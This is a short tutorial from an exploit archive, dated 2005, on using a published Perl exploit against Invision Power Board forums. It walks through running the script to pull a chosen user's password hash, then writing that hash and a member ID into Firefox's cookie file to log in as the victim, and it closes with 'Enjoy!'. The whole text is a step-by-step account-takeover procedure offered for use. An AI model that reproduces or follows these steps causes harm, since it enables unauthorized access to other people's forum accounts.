| # danica jones <danica6699@gmail.com> | |
| Tutorial for the recent exploit released by Petey Beege. | |
| 1. Get the exploit from http://www.milw0rm.com/id.php?id=1013 (https://www.exploit-db.com/exploits/1013/) | |
| 2. Make sure you have LWP::UserAgent perl module if not do this: | |
| a. perl -MCPAN -e 'shell' | |
| b. inside the perl shell, do this 'install LWP::UserAgent' | |
| 3. Run the exploit. Get the password hash for the desired login id | |
| ex. inv.pl http://forums.example.com 2 2 | |
| Where 2 is the login id and 2 for version 2 of IPB. | |
| 4. Open wordpad. Edit Mozilla Firefox's cookie file. Mine is located at | |
| C:\Documents and Settings\the1\Application Data\Mozilla\Firefox\Profiles\vspyhjb9.default\cookies.txt" | |
| Add the following entries: | |
| forums.example.com FALSE / FALSE 1148708747 member_id 1 | |
| forums.example.com FALSE / FALSE 1148708747 pass_hash ecb735f70028a9cdb819828f4aced78c | |
| Notice the value of member_id and pass_hash taken from the values | |
| generated by the exploit. | |
| 5. Fire up Mozilla Firefox and login to http://forums.example.com | |
| Enjoy! | |
| # milw0rm.com [2005-05-27] |